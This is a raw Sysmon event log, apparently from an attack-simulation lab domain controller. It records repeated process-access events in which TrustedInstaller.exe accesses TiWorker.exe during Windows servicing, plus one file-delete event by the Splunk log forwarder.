12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.620{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.605{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.605{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.589{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.589{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A121F05251667D7988C2BA4F75F28D25,SHA256=B4D3C497018AE2C3E2622751C4201E92C8305DCAEBB62DFB19B2730932A25019,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.574{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.574{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.558{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.558{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT